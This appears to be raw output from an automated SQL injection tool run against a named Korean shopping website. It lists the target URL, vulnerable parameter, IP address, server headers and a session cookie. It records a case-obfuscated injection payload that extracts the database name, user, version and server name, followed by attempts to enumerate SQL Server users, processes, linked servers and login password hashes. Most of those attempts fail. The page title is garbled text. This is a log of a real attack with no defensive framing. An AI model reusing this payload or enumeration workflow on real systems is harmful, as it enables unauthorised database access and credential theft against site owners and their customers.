■漏洞信息:============================================================
 ・URL:http://www.shopma.net/main/notice/read_gongji.asp?GoTopage=&id=158
 ・页面标题：讥付齿[ShopMa.net] 魄概流 老磊府 秒诀器判_狼幅,棱拳,拳厘前,厘脚备,啊傈,啊备,魔备,寇侥,魄概流,魄概荤盔,魄盟荤盔,讥付胶磐ShopMaster,讥概聪廉ShopManager::
 ・参数:GoTopage=&id=158
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:66.232.142.154
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 03 Apr 2011 16:01:35 GMT
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT 
Pragma: no-cache
cache-control: no-store
Connection: Keep-Alive
Content-Length: 50374
Content-Type: text/html; Charset=euc-KR
Expires: Sun, 03 Apr 2011 16:00:36 GMT
Set-Cookie: ASPSESSIONIDCCDDBCTC=NNCEGJDBLPMEBGBABABNAAJM; path=/
Cache-control: private



■数据库信息:============================================================

■数据库信息:============================================================
- 数据库名：158  AnD (dB_NaMe(0)+cHaR(94)+uSeR+cHaR(94)+@@vErSiOn+cHaR(94)+@@sErVeRnAmE+cHaR(94)+@@sErViCeNaMe+cHaR(94)+sysTeM_UsEr)0  

 ・当前用户权限：
获取用户权限失败！

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
